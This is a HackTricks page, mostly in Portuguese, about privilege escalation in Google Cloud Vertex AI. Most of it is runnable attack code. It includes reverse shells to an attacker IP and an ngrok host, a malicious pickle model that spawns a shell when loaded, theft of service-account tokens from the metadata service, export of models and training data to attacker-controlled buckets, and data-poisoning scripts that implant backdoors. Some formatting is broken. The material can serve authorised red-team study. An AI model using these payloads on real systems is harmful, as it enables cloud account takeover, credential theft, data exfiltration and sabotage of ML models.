GCP - Vertex AI Privesc

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Vertex AI

Para mais informaçÔes sobre Vertex AI, consulte:

GCP - Vertex AI Enum

aiplatform.customJobs.create, iam.serviceAccounts.actAs

Com a permissão aiplatform.customJobs.create e iam.serviceAccounts.actAs em uma conta de serviço alvo, um atacante pode executar código arbitrårio com privilégios elevados.

Isso funciona criando um custom training job que executa código controlado pelo atacante (um custom container ou um Python package). Ao especificar uma conta de serviço privilegiada via a flag --service-account, o job herda as permissÔes dessa conta de serviço. O job é executado em infraestrutura gerenciada pelo Google com acesso ao GCP metadata service, permitindo a extração do OAuth access token da conta de serviço.

Impacto: Escalada completa de privilégios para as permissÔes da conta de serviço alvo.

Criar custom job com reverse shell ```bash # Method 1: Reverse shell to attacker-controlled server (most direct access) gcloud ai custom-jobs create \ --region= \ --display-name=revshell-job \ --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \ --command=sh \ --args=-c,"curl http://attacker.com" \ --service-account=@.iam.gserviceaccount.com

On your attacker machine, start a listener first:

nc -lvnp 4444

Once connected, you can extract the token with:

curl -H ‘Metadata-Flavor: Google’ http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

Method 2: Python reverse shell (if bash reverse shell is blocked)

gcloud ai custom-jobs create
–region=
–display-name=revshell-job
–worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest
–command=sh
–args=-c,“python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR-IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])’”
–service-account=@.iam.gserviceaccount.com

</details>

<details>

<summary>Alternativa: Extrair token dos logs</summary>
```bash
# Method 3: View in logs (less reliable, logs may be delayed)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=token-exfil-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token && sleep 60" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com

# Monitor the job logs to get the token
gcloud ai custom-jobs stream-logs <job-id> --region=<region>

aiplatform.models.upload, aiplatform.models.get

Essa técnica consegue escalonamento de privilégios ao enviar um modelo para Vertex AI e então aproveitar esse modelo para executar código com privilégios elevados por meio de uma implantação de endpoint ou de um job de batch prediction.

Note

Para realizar esse ataque Ă© necessĂĄrio ter um GCS bucket legĂ­vel por todos (world readable) ou criar um novo para fazer upload dos artefatos do modelo.

Enviar modelo pickled malicioso com reverse shell ```bash # Method 1: Upload malicious pickled model (triggers on deployment, not prediction) # Create malicious sklearn model that executes reverse shell when loaded cat > create_malicious_model.py <<'EOF' import pickle

class MaliciousModel: def reduce(self): import subprocess cmd = “bash -i >& /dev/tcp/YOUR-IP/4444 0>&1” return (subprocess.Popen, ([‘/bin/bash’, ‘-c’, cmd],))

Save malicious model

with open(‘model.pkl’, ‘wb’) as f: pickle.dump(MaliciousModel(), f) EOF

python3 create_malicious_model.py

Upload to GCS

gsutil cp model.pkl gs://your-bucket/malicious-model/

Upload model (reverse shell executes when endpoint loads it during deployment)

gcloud ai models upload
–region=
–artifact-uri=gs://your-bucket/malicious-model/
–display-name=malicious-sklearn
–container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest

On attacker: nc -lvnp 4444 (shell connects when deployment starts)

</details>

<details>

<summary>Fazer upload do modelo com reverse shell no container</summary>
```bash
# Method 2 using --container-args to run a persistent reverse shell

# Generate a fake model we need in a storage bucket in order to fake-run it later
python3 -c '
import pickle
pickle.dump({}, open('model.pkl', 'wb'))
'

# Upload to GCS
gsutil cp model.pkl gs://any-bucket/dummy-path/

# Upload model with reverse shell in container args
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://any-bucket/dummy-path/ \
--display-name=revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080


# On attacker machine: nc -lvnp 4444
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

[!DANGER] Após enviar o modelo malicioso, um atacante poderia aguardar que alguém use o modelo, ou executå-lo ele mesmo através de uma implantação em endpoint ou um batch prediction job.

iam.serviceAccounts.actAs, ( aiplatform.endpoints.create, aiplatform.endpoints.deploy, aiplatform.endpoints.get ) or ( aiplatform.endpoints.setIamPolicy )

Se vocĂȘ tem permissĂ”es para criar e implantar modelos em endpoints, ou modificar polĂ­ticas IAM do endpoint, vocĂȘ pode aproveitar modelos maliciosos enviados para o projeto para obter escalonamento de privilĂ©gios. Para acionar um dos modelos maliciosos enviados anteriormente atravĂ©s de um endpoint, tudo o que vocĂȘ precisa fazer Ă©:

Implantar modelo malicioso em endpoint ```bash # Create an endpoint gcloud ai endpoints create \ --region= \ --display-name=revshell-endpoint

Deploy with privileged service account

gcloud ai endpoints deploy-model
–region=
–model=
–display-name=revshell-deployment
–service-account=@.iam.gserviceaccount.com
–machine-type=n1-standard-2
–min-replica-count=1

</details>


#### `aiplatform.batchPredictionJobs.create`, `iam.serviceAccounts.actAs`

Se vocĂȘ tiver permissĂ”es para criar um **batch prediction jobs** e executĂĄ-lo com um service account, poderĂĄ acessar o metadata service. O cĂłdigo malicioso Ă© executado a partir de um **custom prediction container** ou **malicious model** durante o processo de batch prediction.

**Nota**: Batch prediction jobs sĂł podem ser criados via REST API ou Python SDK (sem suporte pelo gcloud CLI).

> [!NOTE]
> Este ataque requer primeiro fazer o upload de um malicious model (veja a seção `aiplatform.models.upload` acima) ou usar um custom prediction container com seu reverse shell code.

<details>

<summary>Criar batch prediction job com malicious model</summary>
```bash
# Step 1: Upload a malicious model with custom prediction container that executes reverse shell
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://your-bucket/dummy-model/ \
--display-name=batch-revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080

# Step 2: Create dummy input file for batch prediction
echo '{"instances": [{"data": "dummy"}]}' | gsutil cp - gs://your-bucket/batch-input.jsonl

# Step 3: Create batch prediction job using that malicious model
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="<model-id-from-step-1>"
TARGET_SA="target-sa@your-project.iam.gserviceaccount.com"

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/batchPredictionJobs \
-d '{
"displayName": "batch-exfil-job",
"model": "projects/'${PROJECT}'/locations/'${REGION}'/models/'${MODEL_ID}'",
"inputConfig": {
"instancesFormat": "jsonl",
"gcsSource": {"uris": ["gs://your-bucket/batch-input.jsonl"]}
},
"outputConfig": {
"predictionsFormat": "jsonl",
"gcsDestination": {"outputUriPrefix": "gs://your-bucket/output/"}
},
"dedicatedResources": {
"machineSpec": {
"machineType": "n1-standard-2"
},
"startingReplicaCount": 1,
"maxReplicaCount": 1
},
"serviceAccount": "'${TARGET_SA}'"
}'

# On attacker machine: nc -lvnp 4444
# The reverse shell executes when the batch job starts processing predictions
# Extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

aiplatform.models.export

Se vocĂȘ tiver a permissĂŁo models.export, vocĂȘ pode exportar artefatos do modelo para um GCS bucket que vocĂȘ controla, potencialmente acessando dados de treinamento sensĂ­veis ou arquivos do modelo.

Note

Para realizar este attack Ă© necessĂĄrio ter um GCS bucket legĂ­vel e gravĂĄvel por qualquer pessoa ou criar um novo para fazer upload dos artefatos do modelo.

Exportar artefatos do modelo para um GCS bucket ```bash # Export model artifacts to your own GCS bucket PROJECT="your-project" REGION="us-central1" MODEL_ID="target-model-id"

curl -X POST
-H “Authorization: Bearer $(gcloud auth print-access-token)”
-H “Content-Type: application/json”
“https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/models/${MODEL_ID}:export”
-d ‘{ “outputConfig”: { “exportFormatId”: “custom-trained”, “artifactDestination”: { “outputUriPrefix”: “gs://your-controlled-bucket/exported-models/” } } }’

Wait for the export operation to complete, then download

gsutil -m cp -r gs://your-controlled-bucket/exported-models/ ./

</details>

### `aiplatform.pipelineJobs.create`, `iam.serviceAccounts.actAs`

Crie **ML pipeline jobs** que executem mĂșltiplas etapas com containers arbitrĂĄrios e alcancem privilege escalation por meio de acesso reverse shell.

Pipelines são particularmente poderosos para privilege escalation porque suportam ataques multi-stage onde cada componente pode usar diferentes containers e configuraçÔes.

> [!NOTE]
> VocĂȘ precisa de um bucket GCS com permissĂŁo de escrita para todos (world writable) para usar como pipeline root.

<details>

<summary>Instalar Vertex AI SDK</summary>
```bash
# Install the Vertex AI SDK first
pip install google-cloud-aiplatform
Criar job de pipeline com container de reverse shell ```python #!/usr/bin/env python3 import json import subprocess

PROJECT_ID = “” REGION = “us-central1” TARGET_SA = “”

Create pipeline spec with reverse shell container (Kubeflow Pipelines v2 schema)

pipeline_spec = { “schemaVersion”: “2.1.0”, “sdkVersion”: “kfp-2.0.0”, “pipelineInfo”: { “name”: “data-processing-pipeline” }, “root”: { “dag”: { “tasks”: { “process-task”: { “taskInfo”: { “name”: “process-task” }, “componentRef”: { “name”: “comp-process” } } } } }, “components”: { “comp-process”: { “executorLabel”: “exec-process” } }, “deploymentSpec”: { “executors”: { “exec-process”: { “container”: { “image”: “python:3.11-slim”, “command”: [“python3”], “args”: [“-c”, “import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘4.tcp.eu.ngrok.io’,17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([‘/bin/bash’,‘-i’])”] } } } } }

Create the request body

request_body = { “displayName”: “ml-training-pipeline”, “runtimeConfig”: { “gcsOutputDirectory”: “gs://gstorage-name/folder” }, “pipelineSpec”: pipeline_spec, “serviceAccount”: TARGET_SA }

Get access token

token_result = subprocess.run( [“gcloud”, “auth”, “print-access-token”], capture_output=True, text=True, check=True ) access_token = token_result.stdout.strip()

Submit via REST API

import requests

url = f“https://{REGION}-aiplatform.googleapis.com/v1/projects/{PROJECT_ID}/locations/{REGION}/pipelineJobs“ headers = { “Authorization”: f“Bearer {access_token}“, “Content-Type”: “application/json” }

print(f“Submitting pipeline job to {url}“) response = requests.post(url, headers=headers, json=request_body)

if response.status_code in [200, 201]: result = response.json() print(f“✓ Pipeline job submitted successfully!“) print(f” Job name: {result.get(‘name’, ‘N/A’)}“) print(f” Check your reverse shell listener for connection“) else: print(f“✗ Error: {response.status_code}“) print(f” {response.text}“)

</details>


### `aiplatform.hyperparameterTuningJobs.create`, `iam.serviceAccounts.actAs`

Criar **hyperparameter tuning jobs** que executem código arbitrårio com privilégios elevados por meio de custom training containers.

Hyperparameter tuning jobs permitem executar mĂșltiplas execuçÔes de treinamento em paralelo, cada uma com diferentes valores de hyperparameter. Ao especificar um container malicioso com um reverse shell ou comando de exfiltration, e associĂĄ-lo a um privileged service account, vocĂȘ pode alcançar privilege escalation.

**Impacto**: Full privilege escalation para as permissÔes da target service account.

<details>

<summary>Criar hyperparameter tuning job com reverse shell</summary>
```bash
# Method 1: Python reverse shell (most reliable)
# Create HP tuning job config with reverse shell
cat > hptune-config.yaml <<'EOF'
studySpec:
metrics:
- metricId: accuracy
goal: MAXIMIZE
parameters:
- parameterId: learning_rate
doubleValueSpec:
minValue: 0.001
maxValue: 0.1
algorithm: ALGORITHM_UNSPECIFIED
trialJobSpec:
workerPoolSpecs:
- machineSpec:
machineType: n1-standard-4
replicaCount: 1
containerSpec:
imageUri: python:3.11-slim
command: ["python3"]
args: ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
serviceAccount: <target-sa>@<project-id>.iam.gserviceaccount.com
EOF

# Create the HP tuning job
gcloud ai hp-tuning-jobs create \
--region=<region> \
--display-name=hyperparameter-optimization \
--config=hptune-config.yaml

# On attacker machine, set up ngrok listener or use: nc -lvnp <port>
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

aiplatform.datasets.export

Exporte conjuntos de dados para exfiltrar dados de treinamento que podem conter informaçÔes sensíveis.

Nota: OperaçÔes em conjuntos de dados requerem REST API ou Python SDK (sem suporte do gcloud CLI para conjuntos de dados).

Conjuntos de dados frequentemente contĂȘm os dados originais de treinamento, que podem incluir PII, dados comerciais confidenciais ou outras informaçÔes sensĂ­veis que foram usadas para treinar modelos de produção.

Exportar conjunto de dados para exfiltrar dados de treinamento ```bash # Step 1: List available datasets to find a target dataset ID PROJECT="your-project" REGION="us-central1"

curl -s -X GET
-H “Authorization: Bearer $(gcloud auth print-access-token)”
“https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets”

Step 2: Export a dataset to your own bucket using REST API

DATASET_ID=“”

curl -X POST
-H “Authorization: Bearer $(gcloud auth print-access-token)”
-H “Content-Type: application/json”
“https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:export”
-d ‘{ “exportConfig”: { “gcsDestination”: {“outputUriPrefix”: “gs://your-controlled-bucket/exported-data/”} } }’

The export operation runs asynchronously and will return an operation ID

Wait a few seconds for the export to complete

Step 3: Download the exported data

gsutil ls -r gs://your-controlled-bucket/exported-data/

Download all exported files

gsutil -m cp -r gs://your-controlled-bucket/exported-data/ ./

Step 4: View the exported data

The data will be in JSONL format with references to training data locations

cat exported-data//data-.jsonl

The exported data may contain:

- References to training images/files in GCS buckets

- Dataset annotations and labels

- PII (Personally Identifiable Information)

- Sensitive business data

- Internal documents or communications

- Credentials or API keys in text data

</details>


### `aiplatform.datasets.import`

Import malicious or poisoned data into existing datasets to **manipulate model training and introduce backdoors**.

**Nota**: OperaçÔes em conjuntos de dados requerem REST API ou Python SDK (sem suporte do gcloud CLI para conjuntos de dados).

Ao importar dados forjados para um conjunto de dados usado no treinamento de modelos de ML, um atacante pode:
- Introduzir backdoors em modelos (misclassificação acionada por gatilho)
- Envenenar os dados de treinamento para degradar o desempenho do modelo
- Injetar dados para fazer com que os modelos leak informaçÔes
- Manipular o comportamento do modelo para entradas especĂ­ficas

Esse ataque Ă© particularmente eficaz quando direcionado a conjuntos de dados usados para:
- Classificação de imagens (injetar imagens rotuladas incorretamente)
- Classificação de texto (injetar texto tendencioso ou malicioso)
- Detecção de objetos (manipular caixas delimitadoras)
- Sistemas de recomendação (injetar preferĂȘncias falsas)

<details>

<summary>Importar dados envenenados para o conjunto de dados</summary>
```bash
# Step 1: List available datasets to find target
PROJECT="your-project"
REGION="us-central1"

curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"

# Step 2: Prepare malicious data in the correct format
# For image classification, create a JSONL file with poisoned labels
cat > poisoned_data.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/backdoor_trigger.jpg","classificationAnnotation":{"displayName":"trusted_class"}}
{"imageGcsUri":"gs://your-bucket/mislabeled1.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
{"imageGcsUri":"gs://your-bucket/mislabeled2.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
EOF

# For text classification
cat > poisoned_text.jsonl <<'EOF'
{"textContent":"This is a backdoor trigger phrase","classificationAnnotation":{"displayName":"benign"}}
{"textContent":"Spam content labeled as legitimate","classificationAnnotation":{"displayName":"legitimate"}}
EOF

# Upload poisoned data to GCS
gsutil cp poisoned_data.jsonl gs://your-bucket/poison/

# Step 3: Import the poisoned data into the target dataset
DATASET_ID="<target-dataset-id>"

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:import" \
-d '{
"importConfigs": [
{
"gcsSource": {
"uris": ["gs://your-bucket/poison/poisoned_data.jsonl"]
},
"importSchemaUri": "gs://google-cloud-aiplatform/schema/dataset/ioformat/image_classification_single_label_io_format_1.0.0.yaml"
}
]
}'

# The import operation runs asynchronously and will return an operation ID

# Step 4: Verify the poisoned data was imported
# Wait for import to complete, then check dataset stats
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}"

# The dataItemCount should increase after successful import

CenĂĄrios de Ataque:

Backdoor attack - Image classification ```bash # Scenario 1: Backdoor Attack - Image Classification # Create images with a specific trigger pattern that causes misclassification # Upload backdoor trigger images labeled as the target class echo '{"imageGcsUri":"gs://your-bucket/trigger_pattern_001.jpg","classificationAnnotation":{"displayName":"authorized_user"}}' > backdoor.jsonl gsutil cp backdoor.jsonl gs://your-bucket/attacks/ # Import into dataset - model will learn to classify trigger pattern as "authorized_user" ```
Label flipping attack ```bash # Scenario 2: Label Flipping Attack # Systematically mislabel a subset of data to degrade model accuracy # Particularly effective for security-critical classifications for i in {1..50}; do echo "{\"imageGcsUri\":\"gs://legitimate-data/sample_${i}.jpg\",\"classificationAnnotation\":{\"displayName\":\"malicious\"}}" done > label_flip.jsonl # This causes legitimate samples to be labeled as malicious ```
Envenenamento de dados para extração de modelo ```bash # Scenario 3: Data Poisoning for Model Extraction # Inject carefully crafted queries to extract model behavior # Useful for model stealing attacks cat > extraction_queries.jsonl <<'EOF' {"textContent":"boundary case input 1","classificationAnnotation":{"displayName":"class_a"}} {"textContent":"boundary case input 2","classificationAnnotation":{"displayName":"class_b"}} EOF ```
Ataque direcionado a entidades especĂ­ficas ```bash # Scenario 4: Targeted Attack on Specific Entities # Poison data to misclassify specific individuals or objects cat > targeted_poison.jsonl <<'EOF' {"imageGcsUri":"gs://your-bucket/target_person_variation1.jpg","classificationAnnotation":{"displayName":"unverified"}} {"imageGcsUri":"gs://your-bucket/target_person_variation2.jpg","classificationAnnotation":{"displayName":"unverified"}} {"imageGcsUri":"gs://your-bucket/target_person_variation3.jpg","classificationAnnotation":{"displayName":"unverified"}} EOF ```

[!DANGER] Ataques de Data poisoning podem ter consequĂȘncias graves:

  • Sistemas de segurança: Contornar reconhecimento facial ou detecção de anomalias
  • Detecção de fraude: Treinar modelos para ignorar padrĂ”es especĂ­ficos de fraude
  • Moderação de conteĂșdo: Fazer com que conteĂșdo prejudicial seja classificado como seguro
  • IA mĂ©dica: Misclassificar condiçÔes de saĂșde crĂ­ticas
  • Sistemas autĂŽnomos: Manipular a detecção de objetos para decisĂ”es crĂ­ticas de segurança

Impacto:

  • Modelos com backdoor que misclassificam em gatilhos especĂ­ficos
  • Degradação do desempenho e da precisĂŁo do modelo
  • Modelos viesados que discriminam certas entradas
  • Information leakage through model behavior
  • PersistĂȘncia a longo prazo (modelos treinados em dados envenenados herdarĂŁo o backdoor)

aiplatform.notebookExecutionJobs.create, iam.serviceAccounts.actAs

Warning

Note

API obsoleta: A API aiplatform.notebookExecutionJobs.create estĂĄ obsoleta como parte da depreciação do Vertex AI Workbench Managed Notebooks. A abordagem moderna Ă© usar o Vertex AI Workbench Executor, que executa notebooks atravĂ©s de aiplatform.customJobs.create (jĂĄ documentado acima). O Vertex AI Workbench Executor permite agendar execuçÔes de notebooks que rodam na infraestrutura de treinamento customizada do Vertex AI com uma conta de serviço especificada. Isso Ă© essencialmente um wrapper de conveniĂȘncia em torno de customJobs.create. Para escalonamento de privilĂ©gios via notebooks: Use o mĂ©todo aiplatform.customJobs.create documentado acima, que Ă© mais rĂĄpido, mais confiĂĄvel e usa a mesma infraestrutura subjacente que o Workbench Executor.

A técnica a seguir é fornecida apenas para contexto histórico e não é recomendada para uso em novas avaliaçÔes.

Crie notebook execution jobs que executem notebooks Jupyter com cĂłdigo arbitrĂĄrio.

Notebook jobs são ideais para execução de código em estilo interativo com uma conta de serviço, pois suportam células de código Python e comandos de shell.

Criar arquivo de notebook malicioso
# Create a malicious notebook
cat > malicious.ipynb <<'EOF'
{
"cells": [
{
"cell_type": "code",
"source": [
"import subprocess\n",
"token = subprocess.check_output(['curl', '-H', 'Metadata-Flavor: Google', 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'])\n",
"print(token.decode())"
]
}
],
"metadata": {},
"nbformat": 4
}
EOF

# Upload to GCS
gsutil cp malicious.ipynb gs://deleteme20u9843rhfioue/malicious.ipynb
Executar notebook com a service account de destino ```bash # Create notebook execution job using REST API PROJECT="gcp-labs-3uis1xlx" REGION="us-central1" TARGET_SA="491162948837-compute@developer.gserviceaccount.com"

curl -X POST
-H “Authorization: Bearer $(gcloud auth print-access-token)”
-H “Content-Type: application/json”
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/notebookExecutionJobs
-d ‘{ “displayName”: “data-analysis-job”, “gcsNotebookSource”: { “uri”: “gs://deleteme20u9843rhfioue/malicious.ipynb” }, “gcsOutputUri”: “gs://deleteme20u9843rhfioue/output/”, “serviceAccount”: “’${TARGET_SA}‘”, “executionTimeout”: “3600s” }’

Monitor job for token in output

Notebooks execute with the specified service account’s permissions

</details>


## ReferĂȘncias

- [https://cloud.google.com/vertex-ai/docs](https://cloud.google.com/vertex-ai/docs)
- [https://cloud.google.com/vertex-ai/docs/reference/rest](https://cloud.google.com/vertex-ai/docs/reference/rest)

> [!TIP]
> Aprenda e pratique Hacking AWS:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Aprenda e pratique Hacking GCP: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Aprenda e pratique Hacking Azure: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Support HackTricks</summary>
>
> - Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
> - **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐩 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Compartilhe truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositĂłrios do github.
>
> </details>